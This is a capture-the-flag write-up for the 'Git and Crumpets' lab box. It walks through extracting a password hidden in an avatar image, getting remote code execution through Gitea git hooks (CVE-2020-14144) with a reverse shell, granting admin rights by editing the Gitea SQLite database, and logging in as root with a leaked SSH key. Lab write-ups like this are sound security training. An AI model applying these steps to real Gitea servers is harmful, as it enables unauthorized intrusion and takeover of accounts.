Git and Crumpets

Penthos
4 min read · Jul 5, 2021

Nmap

Let’s see what we are working with here.

Nmap scan report for git.git-and-crumpets.thm (10.10.255.148)
Host is up (0.022s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
9090/tcp closed zeus-admin

I see git.git-and-crumpets.thm and git-and-crumpets.thm in the Nmap output.
Let's add them to our /etc/hosts file:

sudo nano /etc/hosts

Port 80

Visiting the main website page instantly redirects us to a Rick Astley video (we do love our Rick). After adding the new hosts to the hosts file, I can now see the real page…

Let’s make an account and have a look around the system.
After creating the new account, log in. Once you are in, you will notice a few repos in the Explore tab.

Checking the repo and its commits, we can see 5 changes. Let’s review them.

Now that we know the user's password is in the image, let's get it.

curl http://git.git-and-crumpets.thm/avatars/3fc2cde6ac97e8c8a0c8b202e527d56d -s | strings -n 8 | head

Result:

8tEXtDescription
My 'Password' should be easy enough to guess
E7V:W*555}

Next, we need to find his email; luckily, it's on the user's main profile.

User

Let's log in as the new user, then check if he has any higher privileges.

Yes, Git hooks are available. This will allow us to execute code whenever a change is pushed to the repo.

More info here: https://podalirius.net/en/articles/exploiting-cve-2020-14144-gitea-authenticated-remote-code-execution/

Edit the hook shown above to add a bash shell back to your machine.

Then update the hook script to save it. Now edit the readme.md file with any change to make our hook fire and get a shell.

We can grab the flag in the home folder (/home/git).
It's base64 encoded, so decode it. If you forget …

echo dGhte2ZYzZDZhYTE2fQ= | base64 -d

Root

Let’s now look around the system for any Gitea-related files (database, config, etc.).

find / -type f 2>/dev/null | grep "gitea" | grep "db"

/var/lib/gitea/data/gitea.db      << Looks like what we need!!
/var/lib/gitea/data/gitea-repositories/root/backup.git/objects/05/2db66e7afb93b756a8fd79b1d794299e40a684
/var/lib/gitea/data/gitea-repositories/scones/cant-touch-this.git/objects/7a/8cad890480058860f42788db193afa38182cb6
/var/lib/gitea/data/queues/push_update/000002.ldb
/var/lib/gitea/data/queues/notification-service/000002.ldb
/var/lib/gitea/data/queues/repo_stats_update/000002.ldb
/var/lib/gitea/data/queues/pr_patch_checker/000002.ldb

Now change to that directory. Running file /var/lib/gitea/data/gitea.db
shows us this is an SQLite3 database.

sqlite3 gitea.db

SQLite3 basic cheatsheet:

sqlite> .databases            #List databases
sqlite> .tables               #List tables
sqlite> .schema user          #List schema of the user table
sqlite> .mode column          #Set mode to column
sqlite> .mode tab             #Set mode to tab-separated
sqlite> .mode line            #Set mode to line - my preferred here.
sqlite> .width 10 25 3 6 15   #Set width of columns
sqlite> .show                 #Show current settings

After listing the tables and seeing a user table, let's get the data. Trying to crack the passwords was taking a really long time, so I opted to edit the user we already had access to, giving him admin access via the SQLite database.

UPDATE user SET is_admin=1 WHERE id=3;

Going back to the application we now see a new repo.

Looking at the branches, we can see a new file, dotfiles.

Among the old commits, one in particular looks very interesting.

An ssh key!!

Copy the contents to a new file and restrict its permissions so SSH will accept it. Then, using the “password” from the file name, we can access SSH and get the last flag.

nano id_rsa    #copy contents in
chmod 600 id_rsa
ssh root@git-and-crumpets -i id_rsa

Now we have the last flag and own the box!
